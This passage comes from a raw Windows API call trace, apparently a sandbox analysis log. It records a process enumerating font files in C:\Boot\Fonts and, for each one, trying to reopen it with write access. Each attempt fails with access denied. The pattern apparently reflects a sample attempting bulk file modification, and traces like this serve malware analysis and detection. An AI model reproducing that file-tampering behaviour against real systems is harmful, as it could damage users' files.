HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0083.209] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.209] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.209] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.209] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.209] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0083.209] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0083.210] AreFileApisANSI () returned 1 [0083.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Fonts\\meiryon_boot.ttf", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Fonts\\meiryon_boot.ttf", lpUsedDefaultChar=0x0) returned 31 [0083.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.210] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.210] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0083.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0083.210] AreFileApisANSI () returned 1 [0083.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0083.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3e) returned 0x534d8 [0083.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x534d8, cchWideChar=31 | out: lpWideCharStr="C:\\Boot\\Fonts\\meiryon_boot.ttf") returned 31 [0083.210] CreateFileW (lpFileName="C:\\Boot\\Fonts\\meiryon_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.334] GetFileType (hFile=0x340) returned 0x1 [0083.334] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0083.334] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.334] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.334] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.334] CloseHandle (hObject=0x340) returned 1 [0083.335] AreFileApisANSI () returned 1 [0083.335] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0083.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3e) returned 0x53640 [0083.335] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=31 | out: lpWideCharStr="C:\\Boot\\Fonts\\meiryon_boot.ttf") returned 31 [0083.335] CreateFileW (lpFileName="C:\\Boot\\Fonts\\meiryon_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.335] GetLastError () returned 0x5 [0083.335] GetLastError () returned 0x5 [0083.335] SetLastError (dwErrCode=0x5) [0083.335] GetLastError () returned 0x5 [0083.335] SetLastError (dwErrCode=0x5) [0083.335] GetLastError () returned 0x5 [0083.335] SetLastError (dwErrCode=0x5) [0083.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0083.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.335] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.335] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.335] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4bc156a, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef918492, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x2380b, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="meiryo_boot.ttf", cAlternateFileName="MEIRYO~2.TTF")) returned 1 [0083.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.336] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0083.336] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.336] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0083.336] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.336] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.336] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.336] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.336] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0083.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.336] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0083.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0083.336] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.336] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.336] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.336] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0083.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.336] AreFileApisANSI () returned 1 [0083.336] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Fonts\\meiryo_boot.ttf", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Fonts\\meiryo_boot.ttf", lpUsedDefaultChar=0x0) returned 30 [0083.336] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.336] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.336] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.336] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0083.336] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0083.337] AreFileApisANSI () returned 1 [0083.337] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x533b8 [0083.337] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x533b8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\Fonts\\meiryo_boot.ttf") returned 30 [0083.337] CreateFileW (lpFileName="C:\\Boot\\Fonts\\meiryo_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.338] GetFileType (hFile=0x340) returned 0x1 [0083.338] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0083.338] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.338] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.338] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.338] CloseHandle (hObject=0x340) returned 1 [0083.338] AreFileApisANSI () returned 1 [0083.338] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.338] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53640 [0083.338] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\Fonts\\meiryo_boot.ttf") returned 30 [0083.339] CreateFileW (lpFileName="C:\\Boot\\Fonts\\meiryo_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.339] GetLastError () returned 0x5 [0083.339] GetLastError () returned 0x5 [0083.339] SetLastError (dwErrCode=0x5) [0083.339] GetLastError () returned 0x5 [0083.339] SetLastError (dwErrCode=0x5) [0083.339] GetLastError () returned 0x5 [0083.339] SetLastError (dwErrCode=0x5) [0083.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0083.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.339] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.339] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.339] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4bc156a, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef92a947, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x27a1b, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="msjhn_boot.ttf", cAlternateFileName="MSJHN_~1.TTF")) returned 1 [0083.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0083.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0083.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0083.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0083.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0083.340] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.340] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0083.340] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0083.340] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.340] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.340] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.340] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.340] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0083.340] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.340] AreFileApisANSI () returned 1 [0083.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Fonts\\msjhn_boot.ttf", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Fonts\\msjhn_boot.ttf", lpUsedDefaultChar=0x0) returned 29 [0083.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.340] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.340] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0083.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0083.340] AreFileApisANSI () returned 1 [0083.340] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 29 [0083.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3a) returned 0x533b8 [0083.340] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x533b8, cchWideChar=29 | out: lpWideCharStr="C:\\Boot\\Fonts\\msjhn_boot.ttf") returned 29 [0083.340] CreateFileW (lpFileName="C:\\Boot\\Fonts\\msjhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.341] GetFileType (hFile=0x340) returned 0x1 [0083.341] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0083.341] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.341] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.341] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.341] CloseHandle (hObject=0x340) returned 1 [0083.341] AreFileApisANSI () returned 1 [0083.341] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 29 [0083.341] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3a) returned 0x53640 [0083.341] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=29 | out: lpWideCharStr="C:\\Boot\\Fonts\\msjhn_boot.ttf") returned 29 [0083.341] CreateFileW (lpFileName="C:\\Boot\\Fonts\\msjhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.342] GetLastError () returned 0x5 [0083.342] GetLastError () returned 0x5 [0083.342] SetLastError (dwErrCode=0x5) [0083.342] GetLastError () returned 0x5 [0083.342] SetLastError (dwErrCode=0x5) [0083.342] GetLastError () returned 0x5 [0083.342] SetLastError (dwErrCode=0x5) [0083.342] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0083.342] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.342] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.342] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.342] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.342] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.342] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4be7820, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef93ce3b, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x281fb, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="msjh_boot.ttf", cAlternateFileName="MSJH_B~1.TTF")) returned 1 [0083.342] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.342] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.342] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.342] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.342] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.342] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.342] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.342] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.342] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0083.342] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.342] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0083.342] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.342] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0083.342] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.342] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.342] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.342] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.342] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.342] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.342] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0083.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0083.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0083.343] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.343] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.343] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.343] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0083.343] HeapFree (in: 